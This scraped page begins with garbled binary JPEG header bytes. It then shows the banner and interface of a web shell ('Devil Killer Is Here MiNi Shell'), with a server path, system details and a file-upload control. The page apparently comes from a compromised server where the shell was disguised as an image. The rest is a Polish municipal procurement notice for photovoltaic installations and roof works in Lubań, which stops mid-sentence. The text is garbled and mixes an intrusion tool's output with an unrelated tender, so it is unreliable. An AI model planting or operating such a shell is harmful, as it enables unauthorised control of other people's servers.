JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210708/0010784101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00107841 z dnia 2021-07-08</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa efektywności energetycznej budynków użyteczności publicznej w Gminie Miejskiej Lubań. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Lubań</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821380</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">7 Dywizji 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">75 6464499</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">boi.um@miastoluban.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.luban.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa efektywności energetycznej budynków użyteczności publicznej w Gminie Miejskiej Lubań. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d33b22b0-dfb3-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00107841</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000565/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Poprawa efektywnosci energetycznej budynków użytecznosci publicznej w Gminie Miejskiej Lubań</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.miastoluban.pl/urzad,m,10439,ogloszenia-o-zamowieniach.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://bip.miastoluban.pl/urzad,m,10439,ogloszenia-o-zamowieniach.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/> a Wykonawcami odbywa się drogą elektroniczną przy użyciu mini portalu<br/> https://miniportal.uzp.gov.pl/, ePUAP pod adresem: https://epuap.gov.pl/wsp/portal,<br/> adres skrytki: /umluban/SkrytkaESP,</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">ochronie danych), tzw. "RODO", Administrator Danych informuje, że: <br/>2. Administratorem Pani / Pana danych osobowych jest Urząd Miasta Lubań reprezentowany przez Burmistrza Miasta Lubań. Z administratorem danych można się kontaktować: <br/>1) pod adresem korespondencyjnym : ul. 7 Dywizji 14, 59-800 Lubań <br/>2) pod adresem poczty elektronicznej : boi.um@miastoluban.pl <br/>3.	Inspektorem Ochrony Danych Osobowych w Urzędzie Miasta Lubań jest Pan Ryszard Skowron. W każdym przypadku osoba, której dane dotyczą, może również skontaktować się bezpośrednio z inspektorem ochrony danych: <br/>1) elektronicznie pod adresem poczty elektronicznej : ido@miastoluban.pl <br/>2) na wyżej podany adres korespondencyjny z dopiskiem : inspektor ochrony danych,<br/> <br/>4.	Administrator przetwarza podane przez osobę dane osobowe w celu: <br/>1) związanym z postępowaniem o udzielenie zamówienia publicznego zgodnie z ustawą Prawo zamówień publicznych: <br/>a) dokonania oceny i wyboru oferty Wykonawcy (np. ocena kwalifikacji i doświadczenia wykonawcy), <br/>(b) ułatwienia kontaktu z wykonawcą, zawarcia umowy na podstawie złożonej oferty, (c) podjęcie czynności zmierzających do zawarcia umowy, niezbędność do zawarcia umowy, <br/>d) obowiązki prawne ciążące na administratorze np. co do przechowywania dokumentacji. Ponadto administrator nie dokonuje profilowania po uzyskaniu danych osobowych podanych przez osobę.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.17.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa instalacji fotowoltaicznej na dachu budynku Miejskiego Domu Kultury w Lubaniu,<br/>Przedmiotem Zamówienia są roboty budowlane związane z budową instalacji fotowoltaicznej, na dachu budynku sali widowiskowej Miejskiego Domu Kultury w Lubaniu przy ul. Kościuszki 4. <br/>Zakres robót obejmuje budowę instalacji fotowoltaicznej z podłączeniem do wewnętrznej instalacji elektrycznej obiektu. Roboty obejmują również wymianę papowego pokrycia dachu z jego obróbkami blacharskimi, orynnowaniem i instalacją odgromową oraz naprawę uszkodzonych elementów dachu drewnianego. <br/>Roboty budowlane do wykonania:<br/>•	montaż/demontaż rusztowań zewnętrznych <br/>•	demontaż instalacji odgromowej <br/>•	demontaż papowego pokrycia dachu drewnianego<br/>•	demontaż obróbek blacharskich z orynnowaniem<br/>•	demontaż deskowania dachu – przyjęto rozbiórkę 60-70% powierzchni dachu<br/>•	oczyszczenie krokwi z luźnych części (zniszczone przez szkodniki drewna)<br/>•	miejscowa naprawa polegająca na wymianie uszkodzonych odcinków murłat, ociosaniu i wymianie końcówek krokwi oraz obustronnym wzmocnieniu krokwi <br/>•	deskowanie rozebranych połaci dachowych deskami impregnowanymi ciśnieniowo<br/>•	impregnacja odeskowania i krokwi (pozostała nie demontowana część)<br/>•	montaż haków rynnowych i uchwytów rur spustowych<br/>•	renowacja drewnianych wylotów wentylacyjnych na szczycie dachu 4 szt.<br/>•	montaż obróbek blacharskich z blachy tytanowo – cynkowej<br/>•	ułożenie pokrycia dachowego z papy termozgrzewalnej na dachu drewnianym (warstwa podkładowa + warstwa nawierzchniowa)<br/>•	montaż rynien i rur spustowych<br/>•	budowa instalacji fotowoltaicznej 16,50kW (44 baterie słoneczne 375W monokrystaliczne montowane na dachu oraz jeden inwerter 3-fazowy 20 kW) <br/>•	montaż instalacji odgromowej<br/>•	badania instalacji elektrycznej i odgromowej<br/>Nachylenie połaci dachu przewidzianej do montażu elementów instalacji wynosi 10°. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45310000-3 - Roboty instalacyjne elektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45261214-7 - Kładzenie dachów bitumicznych</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa instalacji fotowoltaicznej na dachu budynku socjalno-biurowego przy <br/>ul. Ludowej w Lubaniu,<br/>Przedmiotem Zamówienia są roboty budowlane związane z budową instalacji fotowoltaicznej, na dachu budynku socjalno-biurowego przy ul. Ludowej w Lubaniu. Zakres robót obejmuje wyłącznie budowę instalacji fotowoltaicznej na dachu budynku .<br/> Roboty budowlane do wykonania:<br/>•	montaż/demontaż rusztowań zewnętrznych <br/>•	budowa instalacji fotowoltaicznej 19,50kW (52 baterie słoneczne 375W monokrystaliczne, montowane na gotowych stelażach posadowionych na dachu budynku oraz inwerter 3 – fazowy 20 kW)<br/>•	demontaż i ponowny montaż instalacji odgromowej<br/>•	badania instalacji elektrycznej i odgromowej<br/>•	uporządkowanie placu budowy<br/>Nachylenie połaci dachu przewidzianej do montażu elementów instalacji wynosi 5°. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45310000-3 - Roboty instalacyjne elektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa instalacji fotowoltaicznej na dachu budynku sali gimnastycznej Szkoły Podstawowej Nr 1 im. Tadeusza Kościuszki w Lubaniu,<br/>Przedmiotem Zamówienia są roboty budowlane związane z budową instalacji fotowoltaicznej, na dachu budynku sali gimnastycznej Szkoły Podstawowej nr 1 im. Tadeusza Kościuszki w Lubaniu, ul. Mickiewicza 1. Zakres robót dotyczy budowy instalacji fotowoltaicznej na dachu sali gimnastycznej oraz dachu piętrowej dobudówki. Roboty obejmują również wymianę papowego pokrycia dachu z jego izolacją termiczną, obróbkami blacharskimi, orynnowaniem i instalacją odgromową oraz wykonanie wewnętrznej elektroenergetycznej linii kablowej niskiego napięcia, zasilającej budynek główny szkoły w energię elektryczną, pochodzącą z instalacji fotowoltaicznej zbudowanej na dachu sali gimnastycznej.<br/>Roboty budowlane do wykonania:<br/>•	montaż/demontaż rusztowań zewnętrznych<br/>•	demontaż warstwy doszczelniającej z piany PUR grub. około 5 cm<br/>•	demontaż pokrycia dachowego z obróbkami blacharskimi, orynnowaniem i instalacją odgromową<br/>•	rozbiórka warstwy dociskowej z betonu grub. około 7 cm<br/>•	rozbiórka warstwy docieplenia z płyt wiórowo-cementowych ,,suprema” grub. 10 cm (sala gimnastyczna) i 20-50 cm (piętrowa dobudówka)<br/>•	oczyszczenie powierzchni dachu<br/>•	podmurowanie ścian attyki o 25 cm<br/>•	obustronne otynkowanie podmurowanych ścian<br/>•	wykonanie wylewki betonowej gr. ok.5 cm na ścianach attyki<br/>•	gruntowanie powierzchni dachu i stropu lepikiem na zimno<br/>•	wykonanie izolacji przeciwwilgociowej (paroizolacji), powierzchni dachu i stropu papą podkładową<br/>•	montaż przy okapach i krawędziach dachu belek oporowych z krawędziaków 15x15 cm<br/>•	ułożenie płyt styropianowych jednostronnie laminowanych ,,styropapa” grub. 15 cm z przyklejeniem do podłoża<br/>•	ułożenie płyt styropianowych nieokleinowanych grubości 15 cm i płyt spadkowych ze styropianu z przyklejeniem do podłoża<br/>•	mechaniczne przymocowanie płyt styropianowych do podłoża za pomocą łączników teleskopowych z wkrętem<br/>•	montaż haków rynnowych<br/>•	montaż obróbek blacharskich<br/>•	ułożenie pokrycia dachowego z papy termozgrzewalnej (warstwa podkładowa + warstwa nawierzchniowa)<br/>•	montaż rynien i rur spustowych<br/>•	budowa instalacji fotowoltaicznej 23,50kW (62 baterie słoneczne 375W monokrystaliczne, montowane na gotowych stelażach posadowionych na dachu budynku sali gimnastycznej oraz jeden inwerter 3 – fazowy 25 kW) <br/>•	wykonanie wewnętrznej linii zasilającej pomiędzy budynkiem sali gimnastycznej a budynkiem głównym szkoły<br/>•	montaż instalacji odgromowej<br/>•	badania instalacji elektrycznej i odgromowej<br/>Nachylenie połaci dachu przewidzianej do montażu elementów instalacji wynosi 5°. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45310000-3 - Roboty instalacyjne elektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45261214-7 - Kładzenie dachów bitumicznych</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa instalacji fotowoltaicznej na dachu budynku Urzędu Miasta przy ul. 7 Dywizji w Lubaniu.<br/>Przedmiotem Zamówienia są roboty budowlane związane z budową instalacji fotowoltaicznej na dachu budynku Urzędu Miasta Lubań, ul. 7 Dywizji 14 oraz roboty remontowe budynku, wchodzące w zakres dostosowania obiektu do obowiązujących przepisów przeciwpożarowych.<br/><br/>- Zakres robót obejmujący budowę instalacji fotowoltaicznej na dachu budynku określa odrębna dokumentacja w postaci; projektu budowlanego i wykonawczego, STWiOR oraz przedmiaru. W ramach przedsięwzięcia zostanie wykonany remont istniejącego papowego pokrycia dachu z jego obróbkami blacharskimi, orynnowaniem i instalacją odgromową. Przewidziano również malowanie zamontowanego na dachu rurowego, stalowego masztu.<br/> Roboty związane z budową instalacji fotowoltaicznej:<br/>•	montaż/demontaż rusztowania zewnętrznego<br/>•	demontaż instalacji odgromowej na dachu<br/>•	demontaż pokrycia dachowego z obróbkami blacharskimi i orynnowaniem (wpusty deszczowe)<br/>•	demontaż wyłazu dachowego<br/>•	oczyszczenie powierzchni dachu<br/>•	naprawa betonowej wylewki dachu polegająca na wymianie uszkodzonych miejsc<br/>•	montaż obróbek blacharskich<br/>•	naprawa tynków kominów oraz ścian attyk<br/>•	montaż wpustów deszczowych<br/>•	obsadzenie wyłazu dachowego <br/>•	ułożenie pokrycia dachowego papą termozgrzewalną (warstwa podkładowa + warstwa nawierzchniowa)<br/>•	czyszczenie z rdzy i malowanie stalowego, rurowego masztu antenowego<br/>•	budowa instalacji fotowoltaicznej 17,00kW (45 baterii słonecznych 375W monokrystalicznych, montowanych na gotowych stelażach posadowionych na dachu budynku oraz jeden inwerter 3-fazowy 20 kW) <br/>•	montaż instalacji odgromowej<br/>•	badania instalacji elektrycznej i odgromowej<br/>Nachylenie połaci dachu przewidzianej do montażu elementów instalacji wynosi 5°.<br/><br/>- Zakres robót związanych z dostosowaniem obiektu do obowiązujących przepisów przeciwpożarowych, określa odrębna dokumentacja w postaci; projektu budowlanego, STWiOR oraz przedmiaru. Zamawiający postanowił wykonać roboty, które związane są z ingerencją w konstrukcję dachu i jego pokrycia, a wykonanie ich po wybudowaniu instalacji fotowoltaicznej byłoby nieracjonalne. <br/>Roboty związane z dostosowaniem obiektu do przepisów p.poż:<br/>•	rozebranie części stropu nad II piętrem (otwór 2,0x1.35 na klatce schodowej) pod klapę oddymiającą<br/>•	rozebranie płyt dachowych żelbetowych (otwór 2,0x1.35 w dachu) pod klapę oddymiającą <br/>•	zmiana lokalizacji drzwi (0,8x2,0) pomieszczenia strychowego polegająca na wykuciu istniejących drzwi, zamurowaniu otworu, wykuciu nowego otworu 